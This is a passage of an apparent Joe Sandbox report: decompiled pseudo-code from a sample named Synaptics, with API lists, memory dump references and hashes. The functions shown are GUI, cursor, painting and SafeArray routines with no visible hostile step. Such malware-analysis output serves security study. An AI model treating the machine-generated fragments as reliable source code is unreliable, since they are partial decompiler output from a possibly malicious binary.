                                                                                                                                                                                                                            						_push(_t18);
                                                                                                                                                                                                                            						L004072E0();
                                                                                                                                                                                                                            						_v16 = _t18;
                                                                                                                                                                                                                            						_v20 = SelectObject(_v16, _t43);
                                                                                                                                                                                                                            						_push(_t46);
                                                                                                                                                                                                                            						_push(0x428fe7);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t49;
                                                                                                                                                                                                                            						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
                                                                                                                                                                                                                            						_pop(_t41);
                                                                                                                                                                                                                            						 *[fs:eax] = _t41;
                                                                                                                                                                                                                            						_push(0x428fee);
                                                                                                                                                                                                                            						SelectObject(_v16, _v20);
                                                                                                                                                                                                                            						DeleteDC(_v16);
                                                                                                                                                                                                                            						_t31 = _v12;
                                                                                                                                                                                                                            						_push(_t31);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						L00407888();
                                                                                                                                                                                                                            						return _t31;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004267F4: GetObjectA.GDI32(?,?), ref: 0042680B
                                                                                                                                                                                                                              • Part of subcall function 004267F4: 73C9AEA0.GDI32(?,00000000,?,?,?,?,?,000000FF,?,?,?,00428F6E), ref: 0042682E
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 00428F76
                                                                                                                                                                                                                            • 73C9A590.GDI32(?,00000000), ref: 00428F82
                                                                                                                                                                                                                            • SelectObject.GDI32(?), ref: 00428F8F
                                                                                                                                                                                                                            • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FB3
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00428FCD
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00428FD6
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,?,?,?,00428FEE,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FE1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$Select$A590B380ColorDeleteTable
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 980243606-0
                                                                                                                                                                                                                            • Opcode ID: 0ebad56f2c6e6d691b04411e0281d05579cb4a1ae04eb320be2d1e6186d7cc52
                                                                                                                                                                                                                            • Instruction ID: 4e07099c4c205c436fb256934ce996c76079a9fb80c20dbc0557a77875d025fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ebad56f2c6e6d691b04411e0281d05579cb4a1ae04eb320be2d1e6186d7cc52
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8116671E052186BDB10EBE9DC41EAEB7BCEB08704F8144BAF904E7281DA789D40C765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00458714(long __eax, void* __ecx, short __edx) {
                                                                                                                                                                                                                            				struct tagPOINT _v24;
                                                                                                                                                                                                                            				long _t7;
                                                                                                                                                                                                                            				long _t12;
                                                                                                                                                                                                                            				long _t19;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                            				short _t28;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				struct tagPOINT* _t31;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t21 = __ecx;
                                                                                                                                                                                                                            				_t7 = __eax;
                                                                                                                                                                                                                            				_t31 = _t30 + 0xfffffff8;
                                                                                                                                                                                                                            				_t28 = __edx;
                                                                                                                                                                                                                            				_t19 = __eax;
                                                                                                                                                                                                                            				_t1 = _t19 + 0x44; // 0x0
                                                                                                                                                                                                                            				if(__edx ==  *_t1) {
                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *((short*)(__eax + 0x44)) = __edx;
                                                                                                                                                                                                                            					if(__edx != 0) {
                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                            						_t7 = SetCursor(E004586EC(_t19, _t28));
                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						GetCursorPos(_t31);
                                                                                                                                                                                                                            						_push(_v24.y);
                                                                                                                                                                                                                            						_t27 = WindowFromPoint(_v24);
                                                                                                                                                                                                                            						if(_t27 == 0) {
                                                                                                                                                                                                                            							goto L5;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t12 = GetWindowThreadProcessId(_t27, 0);
                                                                                                                                                                                                                            							if(_t12 != GetCurrentThreadId()) {
                                                                                                                                                                                                                            								goto L5;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t7 = SendMessageA(_t27, 0x20, _t27, E004079D0(SendMessageA(_t27, 0x84, 0, E00407A64(_t31, _t21)), 0x200));
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCursorPos.USER32 ref: 0045872F
                                                                                                                                                                                                                            • WindowFromPoint.USER32(?,?), ref: 0045873C
                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045874A
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458751
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0045876A
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00458781
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00458793
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1770779139-0
                                                                                                                                                                                                                            • Opcode ID: f6131d98ef82387943452fed01ddfa8e7454534d6ded7eca32afc254d13770e1
                                                                                                                                                                                                                            • Instruction ID: 0e129d7b8b93cd0c48e49d674e41586019fec875b1cb266d62cfcabba037c031
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6131d98ef82387943452fed01ddfa8e7454534d6ded7eca32afc254d13770e1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D501AC2660830425E62036754C87F7F2558DF85B65F14453FBA04762C3ED3DAC05936E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E00454268(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                                                                            				struct HDC__* _v16;
                                                                                                                                                                                                                            				struct tagPAINTSTRUCT _v80;
                                                                                                                                                                                                                            				struct tagRECT _v96;
                                                                                                                                                                                                                            				struct tagRECT _v112;
                                                                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                                                                            				long _v120;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                            				struct HBRUSH__* _t97;
                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                            				void* _t118;
                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                            				intOrPtr _t140;
                                                                                                                                                                                                                            				intOrPtr _t146;
                                                                                                                                                                                                                            				void* _t147;
                                                                                                                                                                                                                            				void* _t148;
                                                                                                                                                                                                                            				void* _t150;
                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                            				intOrPtr _t153;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t148 = __esi;
                                                                                                                                                                                                                            				_t147 = __edi;
                                                                                                                                                                                                                            				_t138 = __edx;
                                                                                                                                                                                                                            				_t127 = __ebx;
                                                                                                                                                                                                                            				_t150 = _t152;
                                                                                                                                                                                                                            				_t153 = _t152 + 0xffffff8c;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t68 =  *_v12 - 0xf;
                                                                                                                                                                                                                            				if(_t68 == 0) {
                                                                                                                                                                                                                            					_v16 =  *(_v12 + 4);
                                                                                                                                                                                                                            					if(_v16 == 0) {
                                                                                                                                                                                                                            						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t150);
                                                                                                                                                                                                                            					_push(0x454436);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t153;
                                                                                                                                                                                                                            					if(_v16 == 0) {
                                                                                                                                                                                                                            						GetWindowRect( *(_v8 + 0x254),  &_v96);
                                                                                                                                                                                                                            						E0043AAC0(_v8,  &_v120,  &_v96);
                                                                                                                                                                                                                            						_v96.left = _v120;
                                                                                                                                                                                                                            						_v96.top = _v116;
                                                                                                                                                                                                                            						E004398B8( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0043F3B8(_v8, _t127, _v12, _t147, _t148);
                                                                                                                                                                                                                            					_pop(_t140);
                                                                                                                                                                                                                            					 *[fs:eax] = _t140;
                                                                                                                                                                                                                            					_push(0x454444);
                                                                                                                                                                                                                            					if(_v16 == 0) {
                                                                                                                                                                                                                            						return EndPaint( *(_v8 + 0x254),  &_v80);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t94 = _t68 - 5;
                                                                                                                                                                                                                            					if(_t94 == 0) {
                                                                                                                                                                                                                            						_t97 = E00425610( *((intOrPtr*)(_v8 + 0x170)));
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v8 + 0x44))();
                                                                                                                                                                                                                            						FillRect( *(_v12 + 4),  &_v112, _t97);
                                                                                                                                                                                                                            						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
                                                                                                                                                                                                                            							GetClientRect( *(_v8 + 0x254),  &_v96);
                                                                                                                                                                                                                            							FillRect( *(_v12 + 4),  &_v96, E00425610( *((intOrPtr*)(_v8 + 0x170))));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t105 = _v12;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t105 + 0xc)) = 1;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t118 = _t94 - 0x2b;
                                                                                                                                                                                                                            						if(_t118 == 0) {
                                                                                                                                                                                                                            							E004541DC(_t150);
                                                                                                                                                                                                                            							_t105 = _v8;
                                                                                                                                                                                                                            							if( *((char*)(_t105 + 0x22f)) == 2) {
                                                                                                                                                                                                                            								if(E00454704(_v8) == 0 || E00454228(_t138, _t150) == 0) {
                                                                                                                                                                                                                            									_t146 = 1;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t146 = 0;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t105 = E0045152C( *(_v8 + 0x254), _t146);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							if(_t118 != 0x45) {
                                                                                                                                                                                                                            								_t105 = E004541DC(_t150);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E004541DC(_t150);
                                                                                                                                                                                                                            								_t105 = _v12;
                                                                                                                                                                                                                            								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
                                                                                                                                                                                                                            									_t105 = _v12;
                                                                                                                                                                                                                            									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return _t105;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 901200654-0
                                                                                                                                                                                                                            • Opcode ID: db1127329ec35ba9265e92a3e95e97328d9cbd62d8671ac9278e586872d5c922
                                                                                                                                                                                                                            • Instruction ID: 131b90634cb33abbaab8d9433d3d521d828b3d7b247f4d7e968007ff8c91c40e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db1127329ec35ba9265e92a3e95e97328d9cbd62d8671ac9278e586872d5c922
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4651F075E04108EFCB00DB99C549E9DB7F8AB49319F5485A6E808EB352D738AE85DB08
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00410B94(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                            				char _v260;
                                                                                                                                                                                                                            				char _v768;
                                                                                                                                                                                                                            				char _v772;
                                                                                                                                                                                                                            				short* _v776;
                                                                                                                                                                                                                            				intOrPtr _v780;
                                                                                                                                                                                                                            				char _v784;
                                                                                                                                                                                                                            				signed int _v788;
                                                                                                                                                                                                                            				signed short* _v792;
                                                                                                                                                                                                                            				char _v796;
                                                                                                                                                                                                                            				char _v800;
                                                                                                                                                                                                                            				intOrPtr* _v804;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed char _t47;
                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                            				intOrPtr* _t91;
                                                                                                                                                                                                                            				void* _t93;
                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                            				void* _t99;
                                                                                                                                                                                                                            				intOrPtr* _t108;
                                                                                                                                                                                                                            				void* _t112;
                                                                                                                                                                                                                            				intOrPtr _t113;
                                                                                                                                                                                                                            				char* _t114;
                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t100 = __ecx;
                                                                                                                                                                                                                            				_v780 = __ecx;
                                                                                                                                                                                                                            				_t91 = __edx;
                                                                                                                                                                                                                            				_v776 = __eax;
                                                                                                                                                                                                                            				if(( *(__edx + 1) & 0x00000020) == 0) {
                                                                                                                                                                                                                            					E00410638(0x80070057);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t47 =  *_t91;
                                                                                                                                                                                                                            				if((_t47 & 0x00000fff) != 0xc) {
                                                                                                                                                                                                                            					_push(_t91);
                                                                                                                                                                                                                            					_push(_v776);
                                                                                                                                                                                                                            					L0040F328();
                                                                                                                                                                                                                            					return E00410638(_v776);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if((_t47 & 0x00000040) == 0) {
                                                                                                                                                                                                                            						_v792 =  *((intOrPtr*)(_t91 + 8));
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v788 =  *_v792 & 0x0000ffff;
                                                                                                                                                                                                                            					_t93 = _v788 - 1;
                                                                                                                                                                                                                            					if(_t93 < 0) {
                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                            						_push( &_v772);
                                                                                                                                                                                                                            						_t54 = _v788;
                                                                                                                                                                                                                            						_push(_t54);
                                                                                                                                                                                                                            						_push(0xc);
                                                                                                                                                                                                                            						L0040F784();
                                                                                                                                                                                                                            						_t113 = _t54;
                                                                                                                                                                                                                            						if(_t113 == 0) {
                                                                                                                                                                                                                            							E00410390(_t100);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E004109E8(_v776);
                                                                                                                                                                                                                            						 *_v776 = 0x200c;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v776 + 8)) = _t113;
                                                                                                                                                                                                                            						_t95 = _v788 - 1;
                                                                                                                                                                                                                            						if(_t95 < 0) {
                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                            							_t97 = _v788 - 1;
                                                                                                                                                                                                                            							if(E00410B08(_v788 - 1, _t115) != 0) {
                                                                                                                                                                                                                            								L0040F79C();
                                                                                                                                                                                                                            								E00410638(_v792);
                                                                                                                                                                                                                            								L0040F79C();
                                                                                                                                                                                                                            								E00410638( &_v260);
                                                                                                                                                                                                                            								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t62 = E00410B38(_t97, _t115);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t98 = _t95 + 1;
                                                                                                                                                                                                                            							_t73 =  &_v768;
                                                                                                                                                                                                                            							_t108 =  &_v260;
                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                            								 *_t108 =  *_t73;
                                                                                                                                                                                                                            								_t108 = _t108 + 4;
                                                                                                                                                                                                                            								_t73 = _t73 + 8;
                                                                                                                                                                                                                            								_t98 = _t98 - 1;
                                                                                                                                                                                                                            							} while (_t98 != 0);
                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                            							} while (_t62 != 0);
                                                                                                                                                                                                                            							return _t62;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t99 = _t93 + 1;
                                                                                                                                                                                                                            						_t112 = 0;
                                                                                                                                                                                                                            						_t114 =  &_v772;
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							_v804 = _t114;
                                                                                                                                                                                                                            							_push(_v804 + 4);
                                                                                                                                                                                                                            							_t18 = _t112 + 1; // 0x1
                                                                                                                                                                                                                            							_push(_v792);
                                                                                                                                                                                                                            							L0040F78C();
                                                                                                                                                                                                                            							E00410638(_v792);
                                                                                                                                                                                                                            							_push( &_v784);
                                                                                                                                                                                                                            							_t21 = _t112 + 1; // 0x1
                                                                                                                                                                                                                            							_push(_v792);
                                                                                                                                                                                                                            							L0040F794();
                                                                                                                                                                                                                            							E00410638(_v792);
                                                                                                                                                                                                                            							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                                                                                                                                                                                            							_t112 = _t112 + 1;
                                                                                                                                                                                                                            							_t114 = _t114 + 8;
                                                                                                                                                                                                                            							_t99 = _t99 - 1;
                                                                                                                                                                                                                            						} while (_t99 != 0);
                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}






























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410C2D
                                                                                                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410C49
                                                                                                                                                                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00410C82
                                                                                                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410CFF
                                                                                                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410D18
                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,00000000), ref: 00410D4D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 351091851-0
                                                                                                                                                                                                                            • Opcode ID: 14f4beccdf032895d207be0bfe30ce8f9fbf525a3445cc88d482939134e69fdd
                                                                                                                                                                                                                            • Instruction ID: 003888812708ca8383a4c1960096dd24bca7936a94d77342cebcc1c5295c8c4e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14f4beccdf032895d207be0bfe30ce8f9fbf525a3445cc88d482939134e69fdd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7551FE7590121D9FCB66DB59C981BD9B3BCAF4C304F4041EAE508E7202D678AFC58FA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00426AA0(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                            				signed short _v44;
                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                            				signed short _t38;
                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                            				signed short _t43;
                                                                                                                                                                                                                            				signed int* _t47;
                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t68 = _t69;
                                                                                                                                                                                                                            				_t70 = _t69 + 0xffffff90;
                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t47 = _a8;
                                                                                                                                                                                                                            				_v24 = _v16 << 4;
                                                                                                                                                                                                                            				_v20 = E00408D24(_v24, __eflags);
                                                                                                                                                                                                                            				 *[fs:edx] = _t70;
                                                                                                                                                                                                                            				_t51 = _v24;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x426d97, _t68, __edi, __esi, __ebx, _t67);
                                                                                                                                                                                                                            				if(( *_t47 | _t47[1]) != 0) {
                                                                                                                                                                                                                            					_t36 = _a4;
                                                                                                                                                                                                                            					 *_t36 =  *_t47;
                                                                                                                                                                                                                            					 *(_t36 + 4) = _t47[1];
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *_a4 = GetSystemMetrics(0xb);
                                                                                                                                                                                                                            					_t36 = GetSystemMetrics(0xc);
                                                                                                                                                                                                                            					 *(_a4 + 4) = _t36;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_v44 = _t36;
                                                                                                                                                                                                                            				if(_v44 == 0) {
                                                                                                                                                                                                                            					E00425F64(_t51);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(_t68);
                                                                                                                                                                                                                            				_push(0x426b89);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t70;
                                                                                                                                                                                                                            				_push(0xe);
                                                                                                                                                                                                                            				_t37 = _v44;
                                                                                                                                                                                                                            				_push(_t37);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                                                                            				_t38 = _v44;
                                                                                                                                                                                                                            				_push(_t38);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				_t39 = _t37 * _t38;
                                                                                                                                                                                                                            				if(_t39 <= 8) {
                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                            					_v32 = 1 << _t39;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v32 = 0x7fffffff;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t61);
                                                                                                                                                                                                                            				 *[fs:eax] = _t61;
                                                                                                                                                                                                                            				_push(0x426b90);
                                                                                                                                                                                                                            				_t43 = _v44;
                                                                                                                                                                                                                            				_push(_t43);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407888();
                                                                                                                                                                                                                            				return _t43;
                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00426AEE
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00426AFA
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 00426B16
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B3D
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B4A
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00426B90,0000000E,00000000,00426B89,?,00000000), ref: 00426B83
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MetricsSystem$B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3145338429-0
                                                                                                                                                                                                                            • Opcode ID: 16b8f12cb14df9c6b7d791b8965e30f23c1242ed487bcd29c7da48a76f1dd96f
                                                                                                                                                                                                                            • Instruction ID: 72199b77af9d5ad6b2438074c355ca19ed48f1e35d4323483afc0bacfeaa441d
